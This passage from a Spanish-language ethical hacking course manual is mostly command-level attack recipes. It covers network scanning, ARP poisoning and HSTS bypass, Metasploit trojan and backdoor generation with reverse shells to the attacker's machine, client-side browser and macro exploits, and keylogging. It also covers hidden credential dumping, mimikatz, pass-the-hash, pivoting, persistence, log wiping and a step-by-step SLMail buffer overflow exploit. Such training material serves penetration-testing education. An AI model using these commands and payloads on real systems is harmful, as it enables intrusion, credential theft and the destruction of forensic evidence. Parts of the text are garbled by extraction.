traceroute (UDP)
Otros tipos de ping

nmap -sP -PS scanme.nmap.org TCP SYN Ping (Puerto 80)
nmap -sP -PU scanme.nmap.org UDP Ping
nmap -sP -PE scanme.nmap.org ICMP Ping
nmap -sP -PR 192.168.1.1/24 ARP Ping
43
ETHICAL HACKING
Escaneo UDP
nmap -sU -sV -p53,161,500 192.168.0.100 -oG nmap-udp.txt
Opciones importantes
-n NO realizar resolucin DNS
-T [0-5] (0:lento, 5:Rpido)
-Pn NO realizar ping
4.2.2.Otras herramientas
Zmap
Zmap es 1300 veces mas rpido que nmap (modo insane)
zmap -M udp -p 53 200.87.100.10/24 -o dns.txt
Masscan
Escaneador de red asncrono
masscan 200.87.100.0/24 -p80 --rate 10
--rate 10 paquetes por segundo
Amap
Nos ayuda a determinar que servicio esta corriendo en un puerto.
amap -A 192.168.0.102 1524
xprobe2
Identificar S.O.
44
ETHICAL HACKING
xprobe2 192.168.0.102
Zenmap
zenmap
45
ETHICAL HACKING
4.3. Escaneadores de vulnerabilidades
No mide la fortaleza de los controles de seguridad

Genera falsos positivos
Los escaneadores de vulnerabilidades deben ser actualizados
regularmente
Nessus
Actualizar
cd /opt/nessus/sbin ; ./nessuscli update
Iniciar el servicio
service nessusd start
Abrir https://localhost:8834/ (Aceptar certificado si es necesario)
Username: kali
Password: Kali2015!
Usar Escaneo de red bsico. Escanea la red en busca de

vulnerabilidades
Si nos sale el error: nessus feed error corregirlo con los comandos:
/opt/nessus/sbin/nessuscli fetch --register KEY
/opt/nessus/sbin/nessusd -R
/opt/nessus/sbin/nessus-service -D
init 6
46
ETHICAL HACKING
OpenVAS
openvas-setup
openvas-start
Ingresar a la interfaz web

https://127.0.0.1:9392
admin
868c8747-cca9-4ae4-a8cb-21539f4341da
Nexpose
Iniciar el servicio
./nscsvc.sh start
/opt/rapid7/nexpose/nsc
Ingresar a la interfaz web
https://localhost:3780/login.htm
4.4. Escaneador de vulnerabilidades en aplicaciones web
VEGA
Iniciar Vega:
Vega
47
ETHICAL HACKING
Web Application Attack and Audit Framework (w3af)
Iniciar w3af:
/opt/web/w3af/
./w3af_gui
Esar el siguiente perfil para el escaneo:
Auditar OWASP top 10
48
ETHICAL HACKING
Wapiti
wapiti http://testasp.vulnweb.com/ --scope domain --color -o

result.html
4.5. Escaneador de configuraciones errneas
SPARTA
Automatiza la exploracin y la enumeracin:
sparta
Examina el servidor web en busca de potenciales problemas y

vulnerabilidades de seguridad, incluyendo:
Malas configuraciones de software y del servidor.

Programas y archivos por defecto.
Programas y archivos inseguros y/o antiguos
49
ETHICAL HACKING
5
ATAQUES EN REDES
LAN
50
ETHICAL HACKING
V. ATAQUES EN REDES LAN
5. Saltando VLANs
Si encontramos dispositivos CISCO mal configurados es posible saltar de

VLANs.
5.1. Switch spoofing (Trunk 802.1Q)
Hacerse pasar por un switch (Configuracin automtica)
voiphopper
Salta de VLANs simulando ser un telfono IP
voiphopper -i eth0 -c 2
-c 2 = Usa CDP Spoof Mode
Yersinia
Abusa el protocolo 802.1Q
5.2. Sniffing pasivo
Modo promiscuo
Es el modo en el que una computadora conectada a una red compartida, captura

todo el trfico que circula por ella.
No muy efectivo ahora por el uso de switchs, pero todava eficiente

para redes wireless
51
ETHICAL HACKING
Configurar la tarjeta de red
ifconfig wlan0 promisc
Capturar password y almacenar en archivo
ettercap -Tzq -w file.pcap -L nombre-log
T: Interfaz de solo texto

z: No ARP scan
q: (quiet) No imprime el contenido de los paquetes
-w: escribir archivo pcap
-L : escribir logs
Procesar archivo de logs
etterlog nombre-log.eci -p
-p: Mostrar passwords
5.3. Sniffing activo
Span port (need access to the switch configuration)

MAC flooding: CAM Table - Content Addressable Memory ( MAC
Port)
ARP Poisoning
Envenamiento ARP
Enviar mensajes ARP falsos a la red con la finalidad de asociar la direccin

MAC del atacante con la direccin IP de otra maquina ejemplo la puerta de
enlace predeterminada (gateway)
52
ETHICAL HACKING
Fig: Trafico de red despus de envenenar una victima
Cain & Abel (Windows XP)
53
ETHICAL HACKING
Man in the Middle framework (MITMf)
STRICT-TRANSPORT-SECURITY (HSTS ) es un header seguro que

obliga a el navegador a "hablar" con el servidor solo mediante HTTPS.
Mitiga ataques de hombre en el medio (Man-in-the-middle)
Soporte en los navegadores:
La herramienta MITMf tiene la capacidad de saltar este mecanismo de

proteccin
Archivo de configuracin:
/etc/mitmf/mitmf.cfg
Envenenando solo un host
mitmf --spoof --arp -i eth0 --hsts --target [IP_victima]

--gateway [IP_gateway]
--hsts = intentar pasar por alto HSTS

--spoof --arp = envenenamiento ARP
5.4. DHCP falso
54
ETHICAL HACKING
Revisar como configurar un servidor DHCP en : Servicios bsicos (Cap I)
5.5. Otros ataques LAN
DHCP startvation attack
Inundar el servidor DHCP con peticiones falsas:
pig.py -v 2 -c [interface]
-v 2 Nivel de mensajes
-c Habilitar colores
Levantar un servidor DHCP falso

Servidor DNS falso
dnschef --fakeip=192.168.0.105 --fakedomains gmail.com

--interface 192.168.0.105
wget gmail.com -O /var/www/index.html
55
ETHICAL HACKING
6
METASPLOIT
56
ETHICAL HACKING
VI. METASPLOIT
6. Tipos de mdulos
Exploits: Sirve para obtener una shell remota

auxiliary: Realizar una tarea en concreta (Ej, Escanear puertos)
Encoders: Antiguamente se usaba para intentar evadir antivirus
Arquitectura:
57
ETHICAL HACKING
Tipos de payload:
Simple: Realiza una tarea concreta Ej: Crear un usuario

Stager: Encargados de crear la conexion entre el atacante y la victima
Staged: Se descargar y ejecutan por los de tipo stager
Iniciando metasploit
La interfaz mas usada es la de comandos, para iniciarlo usar el comando:
msfconsole
6.1. Comando bsicos de metasploit
back Sale del contexto actual

exit Sale de la consola
grep Filtra la salida de otro comando
help Men de ayuda
info Muestra informacin sobre uno o ms mdulos
search Busca en nombres de mdulo y descripciones
Ejemplo:
search samba type:exploit
sessions listado de sesiones disponibles
set Establece una variable de contexto especfica
setg Establece una variable global
show Muestra lo payloads/exploits/etc
use Selecciona un mdulo por su nombre
spool /root/msf.txt Guardar salida en un archivo
resource Ejecuta un script
/root/script.rc
58
ETHICAL HACKING
6.2. Uso bsico
Buscando el modulo adecuado
Windows
Si estamos explotando un sistema windows podemos usar su cdigo de la

vulnerabilidad para buscar el modulo
search ms08-067
Otros
grep linux search proftp
proftp: protocolo o software a explotar

linux : Filtrar por este termino
Cargar modulo y mostrar opciones:
59
ETHICAL HACKING
Configurar parmetros y ejecutar
6.3. Creando backdoors
Payloads mas usados (Windows) :

windows/meterpreter/reverse_tcp
windows/shell/reverse_tcp
windows/shell/bind_tcp
windows/meterpreter/reverse_ord_tcp (~120bytes)
6.3.1. Windows
Crear ejecutable y ejecutar en Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.105

LPORT=443 -f exe > /var/www/troyano.exe
-p = tipo de payload
LHOST = IP de Kali
LPORT = Puerto disponible en Kali
60
ETHICAL HACKING
Tambin podemos generar el backdoor a partir de otro ejecutable

LPORT=443 -x vncviewer.exe -k -f exe > backdoor.exe
-k Mantener funcionalidad
Windows (DLL)
Tambien podemos generar el backdoor como una libreria dll que luego se
inyecte en memoria.

LPORT=443 -f dll > evil.dll
6.3.1.1. Recibir shell
En metasploit:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 443
exploit
Para migrar de proceso automticamente:

set AutoRunScript post/windows/manage/smart_migrate
61
ETHICAL HACKING
6.3.2. Linux
Generar troyano:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.2.16

LPORT=443 -f elf > troyano
elf : Tipo de ejecutable de linux
6.3.2.1. Recibir shell
En metasploit:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 443
Exploit
Obtener una shell mas cmoda:

python -c 'import pty;pty.spawn("/bin/bash")'
6.4. Exploits comunes
S.O. Modulo
Windows XP exploit/windows/smb/ms08_067_netapi
Win2003*
Win2003 exploit/windows/dcerpc/ms03_026_dcom
Windows exploit/windows/smb/ms09_050_smb2_negotiate_func_index
2008 x86
Window Vista
62
ETHICAL HACKING
6.5. Comandos bsicos de meterpreter (Meta-Interpreter)
Una vez explotado una vulnerabilidad podemos obtener una shell remota, o
mejor aun una sesin de meterpreter.
Meterpreter usa una tcnica llamada Inyeccion reflectiva de DLL, el cual

trabaja solo en memoria.
Genricos
background Pone la sesin actual en segundo plano para retornar a

Metasploit, para regresar a la sesin se ejecuta sessions i 1
migrate Permite migrarse a otro proceso en la maquina vctima.
Comandos del sistema de fichero
ls Permite visualizar los archivos en el directorio remoto

actual.
download Permite descargar un archivo de la maquina atacada, es
necesario hacer uso del back-slash doble en la ruta del
mismo.
upload Permite cargar un archivo en una ruta especifica, de la
misma manera que el comando download es necesario
hacer uso del doble slash al momento de indicar la ruta.
search Buscar archivos en el sistema:
search -f *pass*.txt
cat Ver contenido de un archivo
edit archivo.txt Permite editar archivos (Vim)
Comandos de red
ipconfig Permite visualizar todas la informacin de todas tarjetas

de red existentes en la maquina atacada.
route Permite consultar y modificar la tabla de enrutamiento.
63
ETHICAL HACKING
Comandos del sistema
execute Permite ejecutar un comando. Ejemplo:

execute -f file.exe -i -H
-i: Interactuar con el proceso creado
-H Oculto al usuario
getuid Permite consultar el tipo de usuario que la maquina
victima esta ejecutando.
ps Permite consultar todos los procesos que estn en
ejecucin.
shell Permite obtener un Shell, o lnea de comando
sysinfo Permite obtener informacin del sistema
idletime Muestra que tiempo esta inactiva la PC
Otros
screenshot Permite extraer una imagen del escritorio remoto.

hashdump Permite consultar el contenido del la base de datos
SAM en sistemas Windows.
6.6. Otros payloads
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.157

LPORT=80 -f exe >payload.exe
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.80.157

LPORT=443 -f exe >payload.exe
Estos payloads hacen que el trafico se parezca como un trafico HTTP comn y
corriente lo que no hara levantar sospecha en los content-inspection filters
64
ETHICAL HACKING
6.7. Atacando al cliente
Adobe Flash 18-Win7 (FF)
use exploit/multi/browser/adobe_flash_hacking_team_uaf
set URIPATH /
set SRVPORT 80
set SRVHOST [ip-kali]
Java applet payload
Java deja firmar un applet con el nombre que decidamos (apple, google)
Probado en: Win7-IE 8 (Java 7)
use exploit/multi/browser/java_signed_applet
set LPORT 567
set uripath /
set SRVPORT 80
exploit
JMX classes (Java)

Nos permite ejecutar codigo arbitrio fuera del sandbox de Java.
Las versiones afectadas son 7u10 y anteriores
use exploit/multi/browser/java_jre17_jmxbean
set uripath /
set SRVPORT 80
exploit
65
ETHICAL HACKING
Firefox (Plugin)
use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set ADDONNAME Video player
set srvhost [attacker-IP]
set uripath /
set srvport 80
exploit
Macro Office - Powershell

LPORT=443 -f vba-psh
Renombrar mtodo del macro de AutoOpen a Auto_Open

Crear el macro en excel y guardar con compatibilidad para macros
JAVA APPLET (explotacin manual)
/root/Desktop/Laboratorio/ClientAttacks/java/
Actualizar la IP de Kali en el archivo Java.java
Compilar java
/opt/jdk1.7/bin/javac Java.java
66
ETHICAL HACKING
Empaquetar
echo "Permissions: all-permissions" > manifest.txt
jar cvfm Java.jar manifest.txt Java.class
Firmar el applet (.jar)
keytool -genkey -alias signapplet -keystore mykeystore -keypass

mykeypass -storepass password123
jarsigner -keystore mykeystore -storepass password123 -keypass

mykeypass -signedjar SignedJava.jar Java.jar signapplet
Utilizar java.html para embeber el applet

Actualizar la IP
Esperar shell con netcat (KALI)
nc -nlvp 443
6.8. Elevar privilegios
6.8.1.Windows
Enumerar privilegios (Meterpreter)
run post/windows/gather/win_privs
Intentar obtener privilegios de system (Meterpreter)
67
ETHICAL HACKING
getsystem
Subir de privilegios (msfconsole)
use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp
set LHOST [ip-kali]
set LPORT 777
set SESSION 1
exploit
6.8.2.Linux
El elevamiento de privilegios en linux es mas complejo y se lo logra mediante la

explotacin de alguna vulnerabilidad
Udev (Manejador de dispositivos)
Subir de privilegios (msfconsole)
use exploit/linux/local/udev_netlink
set SESSION 1
exploit
Obtener una mejor shell
68
ETHICAL HACKING
6.9. Post explotacin
6.9.1.Windows PowerShell
Es un framework de automatizacin de tareas de Microsoft, que consiste en

un shell de lnea de comandos y lenguaje de scripting construida en .NET
Framework.
PowerShell 1.0 Windows XP, Server 2003 (No instalado por defecto)
PowerShell 2.0 Windows 7 y Windows Server 2008
PowerShell 3.0 Windows 8 y Windows Server 2012
Powershell con metasploit
Para poder usar powershell con metasploit necesitamos inyectar un payload

(windows/powershell_reverse_tcp) en un proceso para recibir una shell de
powershell interactiva.
Obtener meterpreter
Abrir otro msfconsole y esperar shell
set payload windows/powershell_reverse_tcp
set lhost 192.168.80.174
set lport 8888
exploit
Inyectar payload desde el primer meterpreter

run post/windows/manage/payload_inject
PAYLOAD=windows/powershell_reverse_tcp LHOST="192.168.80.174"
LPORT="8888"
Deberiamos recibir otra shell de powershell
Powershell bsico
Listar modulos
69
ETHICAL HACKING
Get-Module -ListAvailable
Listar comandos de un modulo

Get-Command -Module Posh-SecMod
Get-Command -Module Posh-SecMod | where {$_.Name -like "*arp*"}
Establecir politica
Set-ExecutionPolicy RemoteSigned
Remover modulo
Remove-Module -Name PsGet
Posh-SecMod
Info:
Permite realizar ARP/Ping/Port Scan. Requiere powershell 3.0
Instalar posh-SecMod
iex (New-Object
Net.WebClient).DownloadString("https://gist.github.com/darkope
rator/6404266/raw/982cae410fc41f6c64e69d91fc3dda777554f241/gis
tfile1.ps1")
Importar modulo
import-module Posh-SecMod
Realizar escaneos
Invoke-ARPScan -CIDR 192.168.80.1/24
Invoke-PingScan -Range 192.168.80.1-192.168.80.200
70
ETHICAL HACKING
Invoke-PortScan -Target 192.168.80.128 -Ports 22,135,139,445

-Type TCP
Power Sploit
Info:
/opt/post-explotation/Windows/PowerSploit/
Para usar los modulo de powersploit se debe ir instalando uno a uno:
Portscan
Instalando
IEX (New-Object
Net.WebClient).DownloadString("http://[ip-kali]/PowerSploi
t/Recon/Invoke-Portscan.ps1")
Los scripts se pueden descargar de un servidor web local (KALI).
Ejecutando
Invoke-Portscan -Hosts 192.168.80.128,192.168.80.1 -Ports
"23,22,21,445,139,3389"
6.9.2.Keylogger y sniffer
Sniffing
use sniffer
sniffer_interfaces
sniffer_start 3
sniffer_stats 3
sniffer_dump 3 /root/dump.cap
sniffer_stop 3
71
ETHICAL HACKING
3: Numero de interfaz
Keylogger
ps
migrate 1740
keyscan_start
keyscan_dump
keyscan_stop
1740: PID de explorer
6.9.3.Recolectar credenciales almacenadas
Muchas personas almacenan sus passwords en los navegadores, clientes de

correos, etc. Estos pueden ser extrados en texto plano.
/opt/post-explotation/Windows/stored-pass/
Navegadores:
Firefox
Internet Explorer
Google Chrome
Opera Browser
Flock Browser
Subir y ejecutar con meterpreter:
execute -f BrowserPasswordDump.exe -a "-f browser.txt" -H
72
ETHICAL HACKING
-f: Archivo a ejecutar

-a: Argumentos del comando
-H: Invisible al usuario
Clientes de correo:
Microsoft Outlook 2002/XP/2003/2007/2010/2013

Mozilla Thunderbird
Windows Live Mail 2012
IncrediMail
Opera Mail
Google Talk
GMail Notifier
Pidgin (Formerly Gaim) Messenger
Windows Credential Manager
execute -f EmailPasswordDump.exe -a "-f email.txt" -H
Password de red
Network Login Password

Outlook Exchange Server
Windows Live Messenger
Remote Desktop (mstsc.exe)
execute -f NetworkPasswordDump32.exe -a -f red.txt -H
Password de WIFI
execute -f WiFiPasswordDump.exe -a -f wifi.txt -H
Ejecutar script automticamente despus de recibir shell:

set AutoRunScript multi_console_command -rc /root/cmd.rc
73
ETHICAL HACKING
6.9.4. Extraer password y hashes de memoria
Info:
Mimikatz
Extrae password y hashes de LSASS. Dependiendo del mtodo de

autenticacion y el sistema operativo usado se puede extraer diferente
informacin:
74
ETHICAL HACKING
Cargar modulo en meterpreter
load mimikatz
Leer hashes de memoria
msv
Informacin de kerberos (passwords)
kerberos
75
ETHICAL HACKING
6.9.5. Pass the hash
Info:
Server Server
2003 2008
Hay situaciones en las administradores reusan los passwords en varias

maquinas, en este caso se puede usar el hash como password
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST [kali-ip]
set LPORT 443
set SMBUser [user]
set SMBPass [hash]
[hash] tiene el formato:

44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
6.10. Acceder a redes internas:
Se utiliza para poder acceder maquinas de redes internas a travs de una

computadora comprometida.
Una vez obtenido un meterpreter procedemos a escanear la red interna.
run get_local_subnets
run arp_scanner -r 10.0.0.0/24
76
ETHICAL HACKING
6.10.1. Port forwarding
En meterpreter
portfwd add -l 8080 -p 80 -r 10.0.0.12

portfwd list
8080 : puerto local

80 : Puerto remoto
10.0.0.12: IP remota (interna)
Para borrar:
portfwd delete -l 8080 -p 80 -r 10.0.0.12
77
ETHICAL HACKING
6.10.2. Pivotear
Crear ruta:
background
route add 10.0.0.0 255.0.0.0 1
route print
10.0.0.0 = [red]
255.0.0.0 = [mascara]
1 = Numero de sesin de meterpreter
Ahora ya podemos llegar hasta la red interna (10.0.0.0/24) desde metasploit
Escanear red interna:
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.10
set PORTS 21,22,23,25,80,135,445
set THREADS 10
run
78
ETHICAL HACKING
Usando el pivote con otras herramientas
Si deseamos ejecutar cualquier otra herramienta (Ej nmap, etc ) tenemos que
usar un socks proxy para enrutar el trafico.
Iniciar proxy socks (msfconsole)
use auxiliary/server/socks4a
set SRVHOST 127.0.0.1
Run
Usando Proxychains
Adicionar en /etc/proxychains.conf
socks4 127.0.0.1 1080
Escanear IP internas (desde KALI):
proxychains nmap -T5 -sT -Pn -p80 10.0.0.10
Proxychains NO enruta todos los protocolos ( Ej: SMB,UDP)
Ejecutar nmap
proxychains nmap -sT -T5 -n -Pn -p445,80,135 10.0.0.10
79
ETHICAL HACKING
6.11. Persistencia
Registro del sistema
Sube un script y crear entrada en el registro
migrate 3742
run persistence -U -A -i 60 -p 5678 -r 192.168.0.107
3742: PID de explorer

-i 60: Intentar conectarse cada 60 segundos
-p 5678: Puerto remoto
-r 192.168.0..107 = IP_KALI
Registros usados:
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Instalar servicio
Instalar Servicio mediante Meterpreter
run metsvc
Creara el servicio meterpreter
Conectarse al servicio (Metasploit)
set PAYLOAD windows/metsvc_bind_tcp
set LPORT 31337
set RHOST [ip victima]
exploit
80
ETHICAL HACKING
6.12. Borrar huellas
Windows
Logs
Windows server 2003 logs (C:\windows\system32\config)

AppEvent.Evt
SecEvent.Evt
SysEvent.Evt
Windows Vista+ logs (C:\Windows\System32\winevt\Logs)

application.evtx
security.evtx
System.evtx
Podemos borrar logs desde meterpreter
clearev
Se recomienda corromper los logs: Borrando huellas
Linux
Borrar history (linea de comando)
shred -zu ~/.bash_history
Los archivos de log estn ubicados en el directorio: /var/log
Log Descripcion
messages Mensajes de log generales
auth.log, faillog, lastlog Logs de autenticacion
boot.log Logs del boot
syslog Logs del sistema
81
ETHICAL HACKING
mysql.log Log de mysql

apache2/access.log Log de apache
apache2/error.log
Snort/ Logs de snort
6.12.1. Manipulacin de fecha de creacin/acceso
Visualizar fecha de creacin/acceso/modificacin
timestomp -v documento.xls
Borrar la fecha de creacin/acceso/modificacin
timestomp documento.xls -b
82
ETHICAL HACKING
6
DESARROLLO DE
EXPLOITS
83
ETHICAL HACKING
VII. DESARROLLO DE EXPLOITS
Cuando hacemos un escaneo de vulnerabilidades nos encontramos que hay

vulnerabilidades que tienen un exploit publico pero que necesita modificarse y
adecuarse a nuestro escenario.
7. Conceptos bsicos
7.1.1.Los registros del CPU
El CPU necesita almacenar algunos datos temporalmente. Debe recordar la

posicin de la ltima instruccin de forma que sepa dnde ir a buscar la
siguiente. Necesita almacenar instrucciones y datos temporalmente mientras
una instruccin est siendo ejecutada. En otras palabras, la CPU necesita una
pequea memoria interna.
84
ETHICAL HACKING
7.1.2.Mapa de memoria
Cada aplicacin de Windows usa parte de la memoria. La memoria del

proceso contiene 3 segmentos principales:
.text Codigo en ensamblador (Lectura/Ejecucin)

.rdata Variables inicializadas y otras constantes (Lectura/Escritura)
.idata Recursos importados (DLL y librerias)
Para visualizarlos usaremos el software PEexplorer que esta instalado en

windows XP:
Abrimos: C:\LAB\lab5-Exploits\msg.exe
Codigo fuente: Escritorio\Lab\lab5-Exploits\msg.cpp
85
ETHICAL HACKING
7.1.3.Memoria del proceso
0x00000000 to 0x7FFFFFFF asignado al "espacio de usuario"

0x80000000 to 0xFFFFFFFF asignado al "espacio de kernel" (Solo
accesible por el S.O)
Cuando un proceso es creado, tambien se crea un PEB (Process Execution Block)

y TEB (Thread Environment Block).
PEB contiene :
Direccin del archivo ejecutable

Puntero a la informacion acerca del heap
TEB contiene :
Direccin de PEB en memoria

Direccin del stack
Puntero a la primera entrada de la cadena SEH
7.1.4.Stack y Heap
Un programa necesita almacenar variables en algn lado, para eso se usa

stacks y heaps.
stack
Las variables temporales generalmente son almacenadas en el stack. Es una

estructura de datos que funciona as U.E.P.S (ltimo en Entrar, Primero en
Salir)
Operaciones
Pop: Recoger un tem (registro) de la cima de la pila (Stack)
Push: Colocar un tem (registro) en la cima de la pila (Stack)
86
ETHICAL HACKING
Registros importantes del stack:
ESP es usado para llevar el control de las direcciones donde finaliza la

pila (Stack), el cual cambia constantemente (direccin ms baja)
EBP es usado para indicar donde empieza la pila (Stack).
87
ETHICAL HACKING
EIP (Extended Instruction Pointer): Contiene la direccin de la

siguiente instruccin a ejecutar. (Es el que define el flujo del
programa).
Los direcciones de memoria en el stack se pueden referenciar de 3 maneras:
Absoluta: 0034FA73
Relativa a ESP ESP + 4
Relativa a EBP EBP -72
En immunity debugger:
88
ETHICAL HACKING
heap
Para variables de gran tamao, variables cuyo tamao es dinmico o

variables globales, generalmente se usa el Heap.
Usamos el heap cuando usamos la funcion malloc para reservar

memoria en C o new en C++
7.2. Tipos de exploit
/root/Desktop/Laboratorio/Lab5-exploits/basico/
89
ETHICAL HACKING
Stack overflow
Un desbordamiento de buffer es un error de software que se produce

cuando un programa no controla adecuadamente la cantidad de datos que
se copian sobre un rea de memoria reservada (buffer): Cuando dicha
cantidad es superior a la capacidad pre asignada, los bytes sobrantes se
almacenan en zonas de memoria adyacentes, sobrescribiendo registros de
memoria.
Compilar
gcc -o stack stack.c
Causar buffer overflow
./stack 12345678901234567890123456
Heap overflow
Una condicin de desbordamiento de montculo ( heap ) el bfer que puede

ser sobrescrita es asignado en el monticulo (heap), lo que significa
generalmente que fue asigna mediante una rutina como malloc()
Compilar
gcc -o heap heap.c
Causar heap overflow
./heap 123456789012345678901234567890123456
Format string
Ocurre cuando los datos de entrada se evala como una orden por la
aplicacin. De esta manera, el atacante podra ejecutar cdigo, leer la pila
(stack), o causar un fallo de segmentacin en la aplicacin en ejecucin, .
90
ETHICAL HACKING
Compilar
gcc -o string string.c
Provocar error
./string "%p %p %p %p %n"
Tambien se puede provocar error en ejecutables de windows

wine string.exe "AAAA%x%x%x%x"
7.3. Debuggers
7.3.1.IDA
IDA nos permite visualizar el flujo del programa de una mejor manera y
ademas podemos encontrar las funciones propias y su codigo ensamblador con
mayor facilidad.
En windows XP:
C:\SOFTWARE\ida66
91
ETHICAL HACKING
Abrir: C:\LAB\Lab7-exploits\stack.exe con IDA
Interfaz de IDA
Tambin nos permite saber que funciones y de que libreras se importa:
92
ETHICAL HACKING
7.3.2.Immunity Debugger
Para el desarrollo de exploits usaremos immnunity debugger.
Instalado en WIndows XP
Cuando abrimos un ejecutable con immunity tenemos el siguiente workplace:
a) GPU Instructions
Direccin de memoria
cdigo de operacin (vista Hexadecimal) situado en esa direccin.
Cdigo en ensamblador (lenguaje maquina)
Comentarios (Adicionados automticamente por Immunity debugger)
b) Registers
Almacenan variables temporales para el CPU
93
ETHICAL HACKING
EAX
ECX
EDX
EBX
Punteros o indices, almacenan una direccin de memoria

ESP (Extended Stack Pointer)
EBP (Extended Base Pointer)
El registro mas importante:

EIP (Instruction Pointer Register)
c) Memory Dump
Muestra una vista en hexadecimal del programa

Direccin de memoria
Caracteres en hexadecimal situados en esa direccin
Representacin en ASCII
d) Stack
Direccin de memoria
Datos almacenados en esa direccin (valor, otra direccin de memoria)
Comentarios
Vistas:
Executable Modules (e) : Listas todos los dll y otros ejecutables que estn
siendo utilizados por el programa.
94
ETHICAL HACKING
Memory Windows (m): Muestra todos los bloques de memoria que el

programa ha asignado incluyendo DLLs con sus segmentos:
95
ETHICAL HACKING
7.4. Protecciones contra exploits
Prevencin de ejecucin de datos (DEP) es una caracterstica de seguridad

incluida en sistemas operativos modernos y su funcin es la de prevenir que
una aplicacin ejecute desde una regin de memoria no ejecutable.
Address space layout randomization (ASLR) de manera aleatoria asigna
espacios de memoria a los procesos
Stack canaries (cookie stacks):Incluye un valor canario en el stack que
cuando es destruida por un desbordamiento de pila, hace que el programa
detenga la ejecucin.
SAFESEH: La aplicacin genera una tabla que contiene todas las
direcciones de memoria que sern usadas, tambin almacena las
direcciones de memoria de SEH (Structured Exception Handler)
7.5. Desarrollando exploits:

7.5.1.Bufferoverflow
Pasos para explotar buffer overflow
a) Escribir mas datos del que pueda manegar

b) Determinar el offset
c) Determinar el espacio para la shellcode
d) Determinar los malos caracteres
e) Sobrescribir la direccin de retorno (EIP) para modificar el flujo de
programa y se ejecute nuestro cdigo malicioso.
Payload tipico = offset + eip + nop + shellcode
Ejemplo SLMail:
Primero haremos un escaneo con nmap a la maquina windows XP para

determinar que servicio se esta ejecutando en el puerto 110.
96
ETHICAL HACKING
Ahora que sabemos la versin exacta de SLMAIL buscamos un exploit publico

con searchexploit
Tambin se puede buscan online: http://exploit-db.com,

http://www.securityfocus.com/vulnerabilities
Viendo el contenido del exploit 638.py notamos que el exploit es para SLMAIL
5.5 pero para windows server 2000. Lo cual nos obliga a adecuarlo a nuestro
entorno (Windows XP)
Desarrollo del exploit
Hay que tomar en cuenta cualquier los
97
ETHICAL HACKING
/root/Desktop/Laboratorio/Lab5-exploits/win/stack/SLMail
Interactuar con el SLMail (1_interactuar.py)

Solo envia un usuario y password al servidor SLMAIL
a) Fuzzing (2_fuzz.py)
Determinar el numero de bytes que generan error
b) Fuzzing (3_fuzz.py):
Descubrir el offset
Crear un patrn de NN bytes
pattern_create.rb 2700
Revisando los valores con que fue sobreescrito EIP
Immnunity debugger
Con el valor de EIP (39694438) determinar el offset
pattern_offset.rb 39694438
98
ETHICAL HACKING
Determinamos que nuestra shellcode (la letra C por el momento)

sobreescribe el registro ESP. Ahora ampliamos el tamanio del shellcode
("C"*400) a 400 bytes
El espacio promedio de una shellcode es de 400 bytes
c) Determinar malos caracteres
Enviar un conjunto de caracteres (0x01-0xff) como payload para

averiguar que caracteres interrumpen la ejecucin del exploit
(4_fuzz.py)
Usamos este script para generar la versin en binario del payload:
pveWritebin.py chars.bin
Chars.bin = Nombre del archivo que escribe
Comparamos la versin binaria (char.bin) con la versin en memoria

01BFA154 (Direccin donde estn los caracteres en memoria)
!mona compare -f C:\chars.bin -a 01BFA154
99
ETHICAL HACKING
d) Redireccionando el flujo del programa (5_fuzz.py)
El registro ESP tiene una direccin de memoria diferente cada vez que
se ejecuta el programa por eso debemos buscar una direccin de
memoria que no sea aleatoria y apunte al registro ESP.
La instruccion JMP ESP hace un salto al registro ESP (Donde

esta nuestro shellcode). Tambien podemos usar la instruccion CALL
ESP para saltar a ESP
Usaremos el programa nasm_shell.rb para determinar el codigo de

operacion de: JMP ESP
100
ETHICAL HACKING
Es mejor buscar en una DLL propia del programa, de no hallar

un JMP ESP recien usar una DLL del sistema operativo
(kernel32.dll, user32.dll)
Buscando JMP ESP
Determinar que librerias DLL del programa no tienen proteccion ASRL
C:\tools\pefinder
dir /b /w /s "C:\Archivos de programa\SLmail" | pefinder.exe - >

noaslr.txt
101
ETHICAL HACKING
Buscamos si de los DLL cargados por el programa no tienen ASRL
En este caso no hay DLL del programa en la lista de DLL sin ASRL asi que
tenemos que buscar en una DLL del sistema
Ya que no hay ninguna DLL del programa utizable buscaremos en las DLL
del sistema operativo que usa el programa.
En Inmunity debugger:
!mona nosafesehaslr
BINGO! La libreria SLMFC.DLL no tiene proteccin ASRL. Ahora procedemos

a buscar una instruccin JMP ESP en esa DLL.
Buscar JMP ESP por su cdigo de operacin (\xff\xe4) en slmfc.dll
!mona find -s "\xff\xe4" -m SLMFC.DLL
102
ETHICAL HACKING
La direccin 0x5f4a358f en SLMFC.dll contiene la instruccin JMP ESP.

Pero esta direccion esta en formato little endian (al revs), asi que para
usarlo en el script debemos anotarlo al reves.
0X5f4a358f = "\x8F\x35\x4A\x5F"
Alternativamente podemos buscar direcciones del Sistema Operativo

que salten a ESP con la herramienta findjmp.exe
findjmp.exe SLMFC.dll esp
C:\tools
e) Generando shellcode
Usaremos metasploit para generar un payload sin los malos caracters

("\x00\x0a\x0d\x20") que nos envie una shell a nuestra maquina.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.16 LPORT=4444

EXITFUNC=thread -b "\x00\x0a\x0d\x20" -f python
f) Obtener shell
Iniciar escuchador de conexin (Netcat) antes de ejecutar el script

5_fuzz.py
103
ETHICAL HACKING
nc -nvlp 4444
El codigo 0x90 (noop) es una instruccion que no hace nada. Se

lo usa de comodin en los shellcodes
Otros mtodos para salta a ESP
a) PUSH ESP + RET
Obteniendo OP code de PUSH ESP + RET
Encontrar PUSH ESP + RET en SLMFC.DLL
!mona find -s "\x54\xC3" -m SLMFC.DLL
Como funciona PUSH ESP + RET ?
